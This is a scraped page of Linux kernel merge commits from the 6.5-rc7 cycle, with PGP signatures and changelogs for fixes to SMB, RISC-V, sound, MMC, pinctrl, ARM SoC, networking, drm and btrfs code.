-----BEGIN PGP SIGNATURE----- iQGzBAABCgAdFiEE6fsu8pdIjtWE/DpLiiy9cAdyT1EFAmTfk2wACgkQiiy9cAdy T1GisAwAobMfIbWSP3lC2TXiAjEf/4ss145H0VjqPDtIm9T1DxdVDT1YgiOi3b6r T5xl6CaVvamMbG8ZDtWDqMWA6z/7ZTTq6OIbZGBXNCaZvJTS1k32HG13IDrpLtD1 TyjXyyXi3OA6MGIiIZttA8ziJu7Osmc3OBuwoPf8eKcQilF1TiTM+rHksS1WThCB 2K+OYlOe6Fiihprqh6W3zbQl9h3+oPMHhEjEKBgiCPLDFtFpwhoUqOx6cFGNbMTn 38/hEiSG/K8kBSBgePVN1zxtTi7qPaazjTVkCKB3PjAtl0QhW6RWg3Ige5Mjg1Sk 0MLIhpcw9XqYsEIFc5yHwyCi2AxbzZ1XSnfgfJr0Jd+phW6yFoJCHojgfagGs1ez YldsPYFiSJDC+ugJUMd2KemEebO9y4qfI8Ocde2f7GJijOhQhFw5bunc5g5EtZAy tj3w0l1pmXgVsePjWurO3VvSm1/trNShOg7h0oHIVTEtHVcXAFQED1xxTdC6aQSC htPunLUN =wyXy -----END PGP SIGNATURE----- Merge tag '6.5-rc6-smb3-client-fix' of git://git.samba.org/sfrench/cifs-2.6 Pull smb client fix from Steve French: "A small SMB mount option fix, also for stable" * tag '6.5-rc6-smb3-client-fix' of git://git.samba.org/sfrench/cifs-2.6: smb: client: fix null auth |
||
|
Linus Torvalds
|
cd479d9c72 |
RISC-V Fixes for 6.5-rc7
* A fix to avoid excessive rejections from seccomp RET_ERRNO rules. * A fix for compressed jal/jalr decoding. * A pair of fixes for independent irq/softirq stacks on kernels built with CONFIG_FRAME_POINTER=n. * A fix to avoid a hang handling uaccess fixups. * Another build fix for toolchain ISA strings, this time for Zicsr and Zifenci on old GNU toolchains. -----BEGIN PGP SIGNATURE----- iQJHBAABCAAxFiEEKzw3R0RoQ7JKlDp6LhMZ81+7GIkFAmTfa34THHBhbG1lckBk YWJiZWx0LmNvbQAKCRAuExnzX7sYidwxD/9EeVWNnjAzZyz6dKtQRFe4czuQepXI 5Apcc8UKUs2vFfWybAAL8ICyzZ0ME8Vc+UfAZkFhouCBHpxMWmPDpkGiGxwKYw+E hWZeyIC8Vn/3mmdEvUVrFU37uyndhRaej6sJQb8tj2SLo4K3PvUELl6fhnSs2ESk EaSaOtTnC3DLKpJTup0jvCa1T9aGwVpEVuc7yjARiAxAquxH5ky6N5/l3gCGTQzJ Yph/llxhwmR83zwqto5kHS9nCWi6noammBCYl+Kbb7jMg6UMMBK6T3Dube5rvyqd 7ZEQNWAQ2RDs5pQJklutYjSCE+5LjONMX7IlrBR3plAMfXiLx+K3FhuMizHKD0YZ EIQ1QtsEuu6xPPZXig4KViEp75fRGnV6xJApAE0o0fUCJ7r77vddUJQDQdN3HhGe qfo8sEub8eWZ/IklkVhr6zsZAqMx6srb9r+T/iT+9KW9HKDNfNdEHc8FLuMjzm+C tIrrcZE40N7d37KVB/myWeDBrYAx6Bd6YaJOnuAR8H2t1dSj9rvxi7XFHfVdyRTs SUBQ0BCdMV+1UYmU1qtqWpti06nepeY3EMm4JLUFvKP+7jHBEcEwoye6/hGiTu7d rNsh6kB1Qq29JNQSn5HsOl89QRfz7orRGVZhTW9clhxrgV9fmy+pW9UG564NSSKI tBQGCt7OvXVMsQ== =LtPj -----END PGP SIGNATURE----- Merge tag 'riscv-for-linus-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/riscv/linux Pull RISC-V fixes from Palmer Dabbelt: - avoid excessive rejections from seccomp RET_ERRNO rules - compressed jal/jalr decoding fix - fixes for independent irq/softirq stacks on kernels built with CONFIG_FRAME_POINTER=n - avoid a hang handling uaccess fixups - another build fix for toolchain ISA strings, this time for Zicsr and Zifenci on old GNU toolchains * tag 'riscv-for-linus-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/riscv/linux: riscv: Handle zicsr/zifencei issue between gcc and binutils riscv: uaccess: Return the number of bytes effectively not copied riscv: stack: Fixup independent softirq stack for CONFIG_FRAME_POINTER=n riscv: stack: Fixup independent irq stack for CONFIG_FRAME_POINTER=n riscv: correct riscv_insn_is_c_jr() and riscv_insn_is_c_jalr() riscv: entry: set a0 = -ENOSYS only when syscall != -1 |
||
|
Linus Torvalds
|
ce03e1807c |
sound fixes for 6.5-rc7
Slightly bigger than I wished, but here we go, a collection of fixes for 6.5. The only change in the core side is the ease for repeated ASoC error messages, and the rest are all pretty device-specific small fixes (including regression fixes) for ASoC Intel and HD-audio / USB-audio quirks. -----BEGIN PGP SIGNATURE----- iQJCBAABCAAsFiEEIXTw5fNLNI7mMiVaLtJE4w1nLE8FAmTeNSQOHHRpd2FpQHN1 c2UuZGUACgkQLtJE4w1nLE84fg//fxij0/hGOgQIIisCxaDoWDL5i/n4x0U6mjbu Z0IVHIYy2A55ZWi5xVG1g0DFIe2zlU5hhpB4YKyod9PEXSS9jYKg3BNbDY5kAexn 9+jBOUr2c2rKY9SpN9kpX9Lu89mIuQC+xtmlxwkm8+q6YVoYUHkFy0J6KfJ8x2JQ tmViD0cH5T390M+jmXMbYgSkzMCylZ2SPXh7dDbPk+oD61Zco7oWIbdKGkTL2qZC 60/igB7N9sVL9ni6yFMHWL/IZ+qQhin+HPbNWT2d6nP45bWquTedxlxNpbYRbLng pnz7aJ7g+l2honVZGObGNfjMNOZeG1uQi4l5gTBtLKdk5oxHmTItWcyZ92Rps1wT 1KIYApi/X9j1aVKqjD51KzPDaQIC66WQU5LA5N2TKHujWKrEl5crLcR6gc/Uqbvt hMnvYZctkicsEuUuOhsBmBn9/ye5+DDwg5EEr7p5gkvvJi+StxA1N7zGwWPLnNX6 Nhnvo9c8GlEa7QHHlO7LzTWQbpkgCOiSKFvWoNoQAgrOwzkMARfFxjFjVuvQsgXx y5DUXsw9+k8v/ITWalulPK9VtzaY7OQK6tMlonxMuWcPGmO7a+0S7MHiQcuI+45f wXMVaC5V48s95CiFn516UsoktY1foztr4UMDSOHBkS9Ap4g5BoxUiyL95lxOena0 5kYgmRE= =DE5T -----END PGP SIGNATURE----- Merge tag 'sound-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound Pull sound fixes from Takashi Iwai: "Slightly bigger than I wished, but here we go, a collection of fixes for 6.5. The only change in the core side is the ease for repeated ASoC error messages, and the rest are all pretty device-specific small fixes (including regression fixes) for ASoC Intel and HD-audio / USB-audio quirks" * tag 'sound-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound: ALSA: hda/realtek - Remodified 3k pull low procedure ASoC: rt1308-sdw: fix random louder sound ALSA: hda/cs8409: Support new Dell Dolphin Variants ALSA: hda/realtek: Switch Dell Oasis models to use SPI ALSA: hda/realtek: Add quirks for HP G11 Laptops ASoC: meson: axg-tdm-formatter: fix channel slot allocation ASoC: SOF: ipc4-topology: Update the basecfg for copier earlier ASoC: SOF: intel: hda: Clean up link DMA for IPC3 during stop ASoC: Intel: sof-sdw-cs42142: fix for codec button mapping ASoC: Intel: sof-sdw: update jack detection quirk for LunarLake RVP ASoC: SOF: Fix incorrect use of sizeof in sof_ipc3_do_rx_work() ASoC: lower "no backend DAIs enabled for ... Port" log severity ASoC: rt5665: add missed regulator_bulk_disable ASoC: max98363: don't return on success reading revision ID ALSA: usb-audio: Add support for Mythware XA001AU capture and playback interfaces. ASoC: fsl: micfil: Use dual license micfil code |
||
|
Linus Torvalds
|
88d4a1643a |
MMC core:
- Fix in_flight[issue_type] value error to properly manage requests MMC host: - wbsd: Fix double free in the probe error path - sunplus: Fix error path in probe - sdhci_f_sdh30: Fix order of function calls in sdhci_f_sdh30_remove -----BEGIN PGP SIGNATURE----- iQJLBAABCgA1FiEEugLDXPmKSktSkQsV/iaEJXNYjCkFAmTfOOEXHHVsZi5oYW5z c29uQGxpbmFyby5vcmcACgkQ/iaEJXNYjCkyzA//eUNFzMBspkQbom/amwAJXH7p jx05JOMQE1D2WBkvNvMWEpvJgN4J0Z0rP/tQnJ1+1XR2U/QTWTFf3RWf85vwllFW n95ZLJJfX5Vjihi4MlX+je2s8rip2GYucmJjis1853sY1CTNfuEhuzg27X8KMNp2 tL65caTCai9t6oBCMadODcS3F4m3fdIPuauuB4Cll34aS0YZk0hmYQfCTmpsfpSh IY2t+gnHsa1jUkGkZfcUivhmQ2Pmt2PoVvZwamVG9OMw3GCadYhIw/qLHKHvVJXg 51pE6dXgBAxa10scjurOKv/aKaB+PBikSt/A6KRQ1ROoP06Cq7E+VY7R73G6jEOP mBwjIq8id09dZA6mRHsbUqkOMk2YB5lYAdX/7MVzo6/JW+dAEQ8oU7vV5A529nni b8N6JWRby5aRO3O7wziIjvx0/+8vXG1Siud3Ec/MvIRqsUK8HoMs55bdepwhuOcs F6QHTPmky5i8/4wNcHExnnfZbI+wJeWE0t7Ku2ZrzKb0XMVOkLB8dmy7NKIRHRPS mZTFiGaFcvAyodQ6gTCPeqXclKEUq0XdNM9deU3Zln1KjLCogjh4vSGLAWecbfkq ld5mVgSWexbXnZ32E0Zd2ouCbaWW3P4YAH405T5rD1a9Zm82eTwjh0JltvBqB4bu fqorLOLT6D4gWHKtL2Y= =QVs8 -----END PGP SIGNATURE----- Merge tag 'mmc-v6.5-rc1-2' of git://git.kernel.org/pub/scm/linux/kernel/git/ulfh/mmc Pull MMC fixes from Ulf Hansson: "MMC core: - Fix in_flight[issue_type] value error to properly manage requests MMC host: - wbsd: Fix double free in the probe error path - sunplus: Fix error path in probe - sdhci_f_sdh30: Fix order of function calls in sdhci_f_sdh30_remove" * tag 'mmc-v6.5-rc1-2' of git://git.kernel.org/pub/scm/linux/kernel/git/ulfh/mmc: mmc: f-sdh30: fix order of function calls in sdhci_f_sdh30_remove mmc: sunplus: Fix error handling in spmmc_drv_probe() mmc: sunplus: fix return value check of mmc_add_host() mmc: wbsd: fix double mmc_free_host() in wbsd_init() mmc: block: Fix in_flight[issue_type] value error |
||
|
Linus Torvalds
|
f33fd7eb20 |
Some pin control fixes for v6.5, fixes two issues with the
Qualcomm SA8775P platform:
- Some minor device tree binding flunky that is nice to iron
out but more importantly:
- Support the increased interrupt targets mask from 3 to 4
bits, making interrupts with higher (hardware) numbers
work.
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEElDRnuGcz/wPCXQWMQRCzN7AZXXMFAmTfJLYACgkQQRCzN7AZ
XXNFOhAAtkMQZ8bV8DJZbB30aim6jDn/2fmI1NywnNdkfpI5FUvRHr+z4I2FNwUJ
rNs1l9aTzxZGOcl/iqI2sJNqr7G+mRrnQZVcEypgtuwteXefSm5FWPQypiIhsG15
0aoF0Ohe2jDf2kl74g67tUc6LJBGcjK4SW8CJUUv9LkjT16BkAnnAttUQch6qKBS
8Txmv/d4XOuuqoSW3yMGfr8NHUmCj+/yNEOso9KiB9R/aHsOjvol1ZLpXlQgQmSG
LAzhgcHO+vN4lb8o7n5T3r83YHCUnkB5qy1tTAQWe+jCRgWJRx1x7BHlevJZmshq
+GPd6+dYMHGacFq5p22KsvB2Gk1rELGa6iPod6eFJ/9iPuvALgbFOoLh51q7OZM6
5NgJDMwLQuqiDGTovdH3GprdabN3iS99F9eV8MXvZInq6coS7hYH0cTLiz7848rE
tdC0q4+nN/+M+BrB5F8h02QByAHJ7Tn4L8NOxuQM/LAUYXfZDPdrqeSctY4tvfQL
wgZpCy4942LIK68Hszii9VgpAfffJ21j+OCdso1pnpFepB0kuW/rUBW9GSAxAH+s
0inhegO367JfrIKJDWtepb5xBDf5iIK5nvRtoB0eQWUfm6WqhDHgdUMpIXT70Nhi
C0JeElpgp061qidWJRWWpQ1n8iYIPZf7sMyQvxbFWfHxIUcqRmQ=
=Rn8a
-----END PGP SIGNATURE-----
Merge tag 'pinctrl-v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl
Pull pin control fixes from Linus Walleij:
"Fixes two issues with the Qualcomm SA8775P platform:
- Some minor device tree binding flunky that is nice to iron out but
more importantly:
- Support the increased interrupt targets mask from 3 to 4 bits,
making interrupts with higher (hardware) numbers work"
* tag 'pinctrl-v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl:
pinctrl: qcom: Add intr_target_width field to support increased number of interrupt targets
dt-bindings: pinctrl: qcom,sa8775p-tlmm: add gpio function constant
|
||
|
Linus Torvalds
|
80706f5529 |
ARM: SoC fixes for 6.5, part 3
As usual, mostly DT fixes for the major Arm platforms from Qualcomm and
NXP, plus a bit for Rockchips and others:
The qualcomm fixes mainly deal with their higher-end arm64 devices trees,
fixing issues in L3 interconnect, crypto, thermal, UFS and a regression
for the DSI phy.
NXP i.MX has two correctness fixes for the 64-bit chips, dealing with
the imx93 "anatop" module and the CSI interface. On the 32-bit side,
there are functional fixes for RTC, display and SD card intefaces.
Rockchip fixes are for wifi support on certain boards, a eMMC stability
and DT build warnings.
On TI OMAP, a regulator is described in DT to avoid problems with the
ethernet phy initialization.
The code changes include a missing MMIO serialization on OMAP, plus a
few minor fixes on ASpeed and AMD/Zynq chips.
-----BEGIN PGP SIGNATURE-----
iQIzBAABCgAdFiEEiK/NIGsWEZVxh/FrYKtH/8kJUicFAmTe2VcACgkQYKtH/8kJ
Uid+qxAAkNF+0roAULDQ9YCg8nnv9l6VN4AGu4K7PA/C8rouW8FbWmpc85xTBV9a
rSm2AwdZEeHMb5S1hpdgu28MA4f3ja6IYIYSCjob4nE1mfgpVVwfxE6AXjUKApBp
y6JN/jK/9W30JDLiReOFcsGNkM5Yqj80XKCBf+6/XLUfSWm90xgvXMFFte2p+AsV
Qb4OInSIT06CtbkZ/DMJx9fFXPeB/lig5joLeuU7eChCXVF+GwcgRzBIueHvH4VS
FbAEnprhlfDHfj4zvZAFKTXYhLDLCkWwxOHilGxauXykWhGP/4XY0qc6z1tk7y+5
r8SPRgEAX4D6D4PwvloxhTJ5WnyqIzk6cS+8WYxMiheurzDGVnoofYp+dWR5CNMj
2STXGzX7ZFkxIRZ3M7d8qz7GpzHsTnmQfg8SH4NiYsg/NptyfPLqdRPjYt1vhu+i
zfVIA2tWmRGFDZbyTgFBpBoOz4EyBEyo31r/e2e8D5B7R9/7xC3rJS7wtjX5KWdV
J6APuPKSmeag44gij7dK5vFtOI898FGkUiHEe3U0nUzNolWEogce1r6r1mdNdQsL
HBUeTGI6CAElsX+WSpW0mYS1uLaDXz56fHj5Bm/681PobS69tk7qOv6WdOvyNpNZ
7xtBwfOKDYmNAt5QYEIIAITJ1lm4nQoPdAjsaLeL91/1Sa5M770=
=QlRp
-----END PGP SIGNATURE-----
Merge tag 'soc-fixes-6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/soc/soc
Pull ARM SoC fixes from Arnd Bergmann:
"As usual, mostly DT fixes for the major Arm platforms from Qualcomm
and NXP, plus a bit for Rockchips and others:
The qualcomm fixes mainly deal with their higher-end arm64 devices
trees, fixing issues in L3 interconnect, crypto, thermal, UFS and a
regression for the DSI phy.
NXP i.MX has two correctness fixes for the 64-bit chips, dealing with
the imx93 "anatop" module and the CSI interface. On the 32-bit side,
there are functional fixes for RTC, display and SD card intefaces.
Rockchip fixes are for wifi support on certain boards, a eMMC
stability and DT build warnings.
On TI OMAP, a regulator is described in DT to avoid problems with the
ethernet phy initialization.
The code changes include a missing MMIO serialization on OMAP, plus a
few minor fixes on ASpeed and AMD/Zynq chips"
* tag 'soc-fixes-6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/soc/soc: (30 commits)
ARM: dts: am335x-bone-common: Add vcc-supply for on-board eeprom
ARM: dts: am335x-bone-common: Add GPIO PHY reset on revision C3 board
soc: aspeed: socinfo: Add kfree for kstrdup
soc: aspeed: uart-routing: Use __sysfs_match_string
ARM: dts: integrator: fix PCI bus dtc warnings
arm64: dts: imx93: Fix anatop node size
arm64: dts: qcom: sc7180: Fix DSI0_PHY reg-names
ARM: dts: imx: Set default tuning step for imx6sx usdhc
arm64: dts: imx8mm: Drop CSI1 PHY reference clock configuration
arm64: dts: imx8mn: Drop CSI1 PHY reference clock configuration
ARM: dts: imx: Set default tuning step for imx7d usdhc
ARM: dts: imx6: phytec: fix RTC interrupt level
ARM: dts: imx6sx: Remove LDB endpoint
arm64: dts: rockchip: Fix Wifi/Bluetooth on ROCK Pi 4 boards
ARM: zynq: Explicitly include correct DT includes
arm64: dts: qcom: sa8775p-ride: Update L4C parameters
arm64: dts: rockchip: minor whitespace cleanup around '='
arm64: dts: rockchip: Disable HS400 for eMMC on ROCK 4C+
arm64: dts: rockchip: Disable HS400 for eMMC on ROCK Pi 4
arm64: dts: rockchip: add missing space before { on indiedroid nova
...
|
||
|
Linus Torvalds
|
eabeef9054 |
asm-generic: regression fix for 6.5
Just one partial revert for a commit from the merge window that caused annoying behavior when building old kernels on arm64 hosts. -----BEGIN PGP SIGNATURE----- iQIzBAABCgAdFiEEiK/NIGsWEZVxh/FrYKtH/8kJUicFAmTe0Z8ACgkQYKtH/8kJ UidZGQ/9GFtIHh9QK6XPlAlx3oC6HdFUrOqDwoueNd4sFk9nNAuW+Z/a0YX8DtnQ /SrJPiCtoPPNCMNlxk7ZDx+ra0Tu+iC7rAvRnogKSV8qB35jNLIqhEde2opCa2Dx sfmvtP0hr5c+b8UP9IN2U11WvJhv1yjldHtCKAjSf9zMtwPQjQvAIx1kzSlC57kE zjsKVTB3yXUddhYGR7639RT7/1K25BVcG6kfKIEN/uPm+M/ljk58EJhUhSeEEfBf NmtlhxWzJBySOTk5mjEVUsTAPrAckPI3Vh4sf0qd4rXe4Q+XX9Jvur9kPOoF8lQF GO+WXrmooaEir3+1+w4PB9xXgZD26Iz018xdhcigLgEGefieM1JpvwJa8NarK8UK iLg2+sBvCAJPJQ44E4r1hWf8ZFolEhwzg703/fGIjDPMQnhHNay4i73NyCw4ii2c F+iCFhea5AKz+d5qQuaZmg7klY/4cBIKDVY/EsO4lmK0187eq3zZKJSMLD21+NLy kr63OAV8yXbduLsIOjvR3KrbSvMq+9vasEX4zUGlzA+VR1l+MqtwJI13EPyqhubJ kQQi6PUe/353ECdzwk5IAqMbGP7qhkOuv89+Ff9mPTlKAwDPwdZjbnsz5I5peskB zVBO366Z0w3o2ENv9i4UEa+TtaCMIbLWdXJxPufwoqPHX3v7nUM= =tTzL -----END PGP SIGNATURE----- Merge tag 'asm-generic-fix-6.5' of git://git.kernel.org/pub/scm/linux/kernel/git/arnd/asm-generic Pull asm-generic regression fix from Arnd Bergmann: "Just one partial revert for a commit from the merge window that caused annoying behavior when building old kernels on arm64 hosts" * tag 'asm-generic-fix-6.5' of git://git.kernel.org/pub/scm/linux/kernel/git/arnd/asm-generic: asm-generic: partially revert "Unify uapi bitsperlong.h for arm64, riscv and loongarch" |
||
|
Josef Bacik
|
c962098ca4 |
btrfs: fix incorrect splitting in btrfs_drop_extent_map_range
In production we were seeing a variety of WARN_ON()'s in the extent_map
code, specifically in btrfs_drop_extent_map_range() when we have to call
add_extent_mapping() for our second split.
Consider the following extent map layout
PINNED
[0 16K) [32K, 48K)
and then we call btrfs_drop_extent_map_range for [0, 36K), with
skip_pinned == true. The initial loop will have
start = 0
end = 36K
len = 36K
we will find the [0, 16k) extent, but since we are pinned we will skip
it, which has this code
start = em_end;
if (end != (u64)-1)
len = start + len - em_end;
em_end here is 16K, so now the values are
start = 16K
len = 16K + 36K - 16K = 36K
len should instead be 20K. This is a problem when we find the next
extent at [32K, 48K), we need to split this extent to leave [36K, 48k),
however the code for the split looks like this
split->start = start + len;
split->len = em_end - (start + len);
In this case we have
em_end = 48K
split->start = 16K + 36K // this should be 16K + 20K
split->len = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K
and now we have an invalid extent_map in the tree that potentially
overlaps other entries in the extent map. Even in the non-overlapping
case we will have split->start set improperly, which will cause problems
with any block related calculations.
We don't actually need len in this loop, we can simply use end as our
end point, and only adjust start up when we find a pinned extent we need
to skip.
Adjust the logic to do this, which keeps us from inserting an invalid
extent map.
We only skip_pinned in the relocation case, so this is relatively rare,
except in the case where you are running relocation a lot, which can
happen with auto relocation on.
Fixes:
|
||
|
Borislav Petkov (AMD)
|
6405b72e8d |
x86/srso: Correct the mitigation status when SMT is disabled
Specify how is SRSO mitigated when SMT is disabled. Also, correct the
SMT check for that.
Fixes:
|
||
|
Linus Torvalds
|
0e8860d212 |
Including fixes from ipsec and netfilter.
No known outstanding regressions.
Fixes to fixes:
- virtio-net: set queues after driver_ok, avoid a potential race
added by recent fix
- Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
when VLAN 0 is registered explicitly
- nf_tables:
- fix false-positive lockdep splat in recent fixes
- don't fail inserts if duplicate has expired (fix test failures)
- fix races between garbage collection and netns dismantle
Current release - new code bugs:
- mlx5: Fix mlx5_cmd_update_root_ft() error flow
Previous releases - regressions:
- phy: fix IRQ-based wake-on-lan over hibernate / power off
Previous releases - always broken:
- sock: fix misuse of sk_under_memory_pressure() preventing system
from exiting global TCP memory pressure if a single cgroup is under
pressure
- fix the RTO timer retransmitting skb every 1ms if linear option
is enabled
- af_key: fix sadb_x_filter validation, amment netlink policy
- ipsec: fix slab-use-after-free in decode_session6()
- macb: in ZynqMP resume always configure PS GTR for non-wakeup source
Misc:
- netfilter: set default timeout to 3 secs for sctp shutdown send and
recv state (from 300ms), align with protocol timers
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
-----BEGIN PGP SIGNATURE-----
iQIzBAABCAAdFiEE6jPA+I1ugmIBA4hXMUZtbf5SIrsFAmTemA4ACgkQMUZtbf5S
IrtCThAAj+t35QM5BgGZowmrx9U4yF+kacDkdPztxlT8a/b+famrTtnZJ8USW+PF
VCk3Eu8JXheuyAOMArHyM84/crS6wim6mzGcXaucusA3981PFzoqdgCLLf9emAJ2
j9vzKrnHBtdd5fj8Exwq70KN4CzXyrzRgqwr2EXBK9lH59HjX0+J7o+trbDxNmFK
RZJE2oDCqf939iRGG3PhJryKYBmrQaMtdonNpSU5PiiRT0HnVYcEtdWcOXK7d53D
onpoaPdawcsqsns5c5Qj01E1OdyM8X54BEGkl/S4FmSw5jF9Bp6btmTcxYYtdb7E
M3CeYROZ0Kt8KcKKje/o1AzdGqWq8Hnxfwy+2WulZAHMucshg0JPm6Ev74WRondw
NGYriKJSdORSO8idK9K/i7pnjZXYr9gU50lpPUFU+QzSdd+zv+U11arjAodwI9Wi
pW+dFi3UR7J01LidaxclvHmWnZ7d5sSzE2khpqb0xd0+PagRGesl8qnKyoDJNS1P
IHsOrRh9aXLzEZjud/rVG+sUobQvc1oiHW+hvbJ04GLKoli9U5poGT2fcaa4O67M
T7JcN5oGDF+PIHJKgTEN7pfX2epY33gmofKUhbt/OPOqnvZOVbTu7/ojjuJZ8Lc5
SF8AvTe+lECcX8Htjq30PoVfai+FT6AhnZzK0H9K4HMfUB9O32Q=
=Ze13
-----END PGP SIGNATURE-----
Merge tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net
Pull networking fixes from Jakub Kicinski:
"Including fixes from ipsec and netfilter.
No known outstanding regressions.
Fixes to fixes:
- virtio-net: set queues after driver_ok, avoid a potential race
added by recent fix
- Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
when VLAN 0 is registered explicitly
- nf_tables:
- fix false-positive lockdep splat in recent fixes
- don't fail inserts if duplicate has expired (fix test failures)
- fix races between garbage collection and netns dismantle
Current release - new code bugs:
- mlx5: Fix mlx5_cmd_update_root_ft() error flow
Previous releases - regressions:
- phy: fix IRQ-based wake-on-lan over hibernate / power off
Previous releases - always broken:
- sock: fix misuse of sk_under_memory_pressure() preventing system
from exiting global TCP memory pressure if a single cgroup is under
pressure
- fix the RTO timer retransmitting skb every 1ms if linear option is
enabled
- af_key: fix sadb_x_filter validation, amment netlink policy
- ipsec: fix slab-use-after-free in decode_session6()
- macb: in ZynqMP resume always configure PS GTR for non-wakeup
source
Misc:
- netfilter: set default timeout to 3 secs for sctp shutdown send and
recv state (from 300ms), align with protocol timers"
* tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net: (49 commits)
ice: Block switchdev mode when ADQ is active and vice versa
qede: fix firmware halt over suspend and resume
net: do not allow gso_size to be set to GSO_BY_FRAGS
sock: Fix misuse of sk_under_memory_pressure()
sfc: don't fail probe if MAE/TC setup fails
sfc: don't unregister flow_indr if it was never registered
net: dsa: mv88e6xxx: Wait for EEPROM done before HW reset
net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
i40e: fix misleading debug logs
iavf: fix FDIR rule fields masks validation
ipv6: fix indentation of a config attribute
mailmap: add entries for Simon Horman
broadcom: b44: Use b44_writephy() return value
net: openvswitch: reject negative ifindex
team: Fix incorrect deletion of ETH_P_8021AD protocol vid from slaves
net: phy: broadcom: stub c45 read/write for 54810
netfilter: nft_dynset: disallow object maps
netfilter: nf_tables: GC transaction race with netns dismantle
netfilter: nf_tables: fix GC transaction races with netns and netlink event exit path
...
|
||
|
Linus Torvalds
|
1ada9c0740 |
drm fixes for 6.5-rc7
edid: - revert mode parsing fix that had side effects. i915: - Fix the flow for ignoring GuC SLPC efficient frequency selection - Fix SDVO panel_type initialization - Fix display probe for IVB Q and IVB D GT2 server nouveau: - fix use-after-free in connector code qaic: - integer overflow check fix - fix slicing memory leak panel: - fix JDI LT070ME05000 probing - fix AUO G121EAN01 timings amdgpu: - SMU 13.x fixes - Fix mcbp parameter for gfx9 - SMU 11.x fixes - Temporary fix for large numbers of XCP partitions - S0ix fixes - DCN 2.0 fix qxl: - fix use after free race in dumb object allocation -----BEGIN PGP SIGNATURE----- iQIzBAABCAAdFiEEEKbZHaGwW9KfbeusDHTzWXnEhr4FAmTekjgACgkQDHTzWXnE hr7Dtw/+Lmf8Puh9RIgqLFA6sThkRI3jaj5mr/0arFzCXhQKeVUFhDgbVMndQX2B JajuMYY/tz1ok5dDgUbFkY7P2v+JrDMEpADGbdv1F9OjzimBimydD0fyfY92NTPL LrugeBOQrgw2BQkY12GW010ThrzEYvapF0NTAgMXY10xsVfDkT1OkUS45TrM3KM8 rX7Vwkd48DD+N+c6wjvPP6cIKQHxktOrziCmn2ggsklGUD0anIyVpZ5mk+YC2HV+ fQKt8FihyWzdqRUEjpDn1p4HuLiaKYOBxy1Kwz8jJooqf9dA+SGA+AzXYP3wfUKs SmX7OpwWB22yhOA027oFm4y696EVg7Al4BqyblohWwwpY/hpTMxSReNQAAogTc13 TFQ1QqDM84QDzaLG58jydxh/6gmvLuCZt4Wy/Ho+qHw+n0RGiqt29DkWcGfx0ETu a/t5NANMO+lInmDELi8ns/ZL3m9+uXvl3VDA49VhMk1mZv1Wt+UKz8wJg83tz9SQ 7k9jpEntGGgqarF2X5hwIkTeZZtsnY3bdHaOmr2ed6OJ6Gq64r7gSfVaYx/EL5IN qF6s8Kbow9Y/5LGIkNry0KIrv6C6+XMQSYH0+F0TaeZFh55FPdPakJvxj8lkwGRT gWEhL1bKYeEHk7GgshztCgJl1lc47Dcbg4A7rVAH/Iyqgkqn/Hc= =P1rE -----END PGP SIGNATURE----- Merge tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm Pull drm fixes from Dave Airlie: "Regular enough week, mostly the usual amdgpu and i915 fixes. Also qaic, nouveau, qxl and a revert for an EDID patch that had some side effects, along with a couple of panel fixes. edid: - revert mode parsing fix that had side effects. i915: - Fix the flow for ignoring GuC SLPC efficient frequency selection - Fix SDVO panel_type initialization - Fix display probe for IVB Q and IVB D GT2 server nouveau: - fix use-after-free in connector code qaic: - integer overflow check fix - fix slicing memory leak panel: - fix JDI LT070ME05000 probing - fix AUO G121EAN01 timings amdgpu: - SMU 13.x fixes - Fix mcbp parameter for gfx9 - SMU 11.x fixes - Temporary fix for large numbers of XCP partitions - S0ix fixes - DCN 2.0 fix qxl: - fix use after free race in dumb object allocation" * tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm: drm/qxl: fix UAF on handle creation Revert "drm/edid: Fix csync detailed mode parsing" drm/nouveau/disp: fix use-after-free in error handling of nouveau_connector_create Revert "Revert "drm/amdgpu/display: change pipe policy for DCN 2.0"" drm/amd: flush any delayed gfxoff on suspend entry drm/amdgpu: skip fence GFX interrupts disable/enable for S0ix drm/amdgpu: skip xcp drm device allocation when out of drm resource drm/amd/pm: Update pci link width for smu v13.0.6 drm/amd/pm: Fix temperature unit of SMU v13.0.6 drm/amdgpu/pm: fix throttle_status for other than MP1 11.0.7 drm/amdgpu: disable mcbp if parameter zero is set drm/amd/pm: disallow the fan setting if there is no fan on smu 13.0.0 accel/qaic: Clean up integer overflow checking in map_user_pages() accel/qaic: Fix slicing memory leak drm/i915: fix display probe for IVB Q and IVB D GT2 server drm/i915/sdvo: fix panel_type initialization drm/i915/guc/slpc: Restore efficient freq earlier drm/panel: simple: Fix AUO G121EAN01 panel timings according to the docs drm/panel: JDI LT070ME05000 simplify with dev_err_probe() |
||
|
Jakub Kicinski
|
820a38d8f2 |
Merge branch '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue
